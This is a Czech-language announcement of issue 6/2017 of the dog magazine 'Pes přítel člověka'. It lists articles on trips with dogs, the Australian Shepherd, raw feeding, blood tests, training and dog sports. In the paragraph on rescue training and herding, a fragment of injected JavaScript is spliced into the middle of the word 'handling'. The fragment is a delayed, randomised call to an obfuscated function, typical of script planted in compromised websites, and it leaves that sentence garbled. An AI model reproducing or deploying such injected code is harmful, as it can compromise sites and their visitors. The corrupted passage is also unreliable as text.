www.pespritelcloveka.cz

PES PŘÍTEL ČLOVĚKA 6/2017

Pes přítel člověka číslo 6 na vás čeká od pátku na stáncích!

A opět na vás čeká spousta nových informací o psech, pejscích a pejskařích. 
K tématu měsíce nás inspirovalo krásné počasí, ke kterému neodmyslitelně patří výlety do přírody. Kolo, koloběžka, přívěsný vozík… a naše rady, které se vám můžou na cestách hodit.
Australský ovčák je plemeno, které si zaslouží pozornost veřejnosti. Ve velkém portrétu se dozvíte, zda je tento líbivý pes vhodný i pro vás. Rozhovory s chovateli vám podrobně ozřejmí jeho povahu a využití. Představíme vám i příbuzné plemeno miniaturní americký ovčák, který je už i u nás, a opět vás zasvětíme do tajů genu merle, jenž se vyskytuje nejen u ausíka, ale u mnoha dalších plemen.

Výživa psa – opět se vracíme k tomuto tématu a přinášíme zkušenosti chovatelů různých plemen, tentokráte s krmením syrovou stravou.
Veterina přináší další díl nesmírně zajímavého seriálu Orientujeme se ve výsledcích vyšetření krve – proč se dělají jaterní testy a co všechno se můžeme z nich dozvědět? Kromě toho se dozvíte mnoho novinek o zubech psa.
Oblíbené návodné fotoseriály najdete v rubrikách Výchova psa – cvik Drž a pusť! a Dogdancing – Jede, jede mašinka
Ta nejdůležitější novinka zní: máme vicemistry světa! Naše reprezentace si tento titul přivezla z Mistrovství světa belgických ovčáků, konaného v německém Halle a my vám přinášíme rozhovor s nejúspěšnějším z našich závodníků (vítěze World Cup) Honzy Böhma a pohled tým lídra na posuzování rozhodčích. Další velkou sportovní novinkou je MS agility, které se bude konat u nás, a to ve dnech 5. – 8. října v Liberci. Přinášíme podrobnosti o akci a rozhovory s pozvanými rozhodčími. 
Stopování, nosework, a mantrailing mají jedno společné – využívají skvělý psí čich. Každý z těchto sportů má ale odlišnosti ve výcviku. V seriálu o stopování se dočtete o výhodách, ale i záludnostech nácviku v pachovém čtverci. Nosework je nový mladý sport pro psy všech plemen i věkových kategorií a seriál přináší podrobný návod, jak jej můžete naučit a provozovat i vašeho psa. Další díl o nácviku mantrailingu je deníčkem mladého bloodhounda Chooca.
Nezaostávají ani další rubriky – záchranářský výcvik podrobně popisuje soustředění českých záchranářů na cvičení v Estonsku, pasení vysvětluje, proč je schopnost pást vrozená, a s treibballem se podíváme do světa. Junior handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andling pokračuje dílem o tom, jakých pokroků tento sport v současnosti dosahuje.
Můžete se podívat na vítězné psy z MVP v Praze a klubových výstav šeltií a shiba inu. 
Poslední stránka už tradičně patří útulkáčům hledajícím domov. Pokud hledáte pejska, možná na vás čeká právě na Bouchalce.

Nenechte si nové číslo ujít! Od pátku na všech stáncích!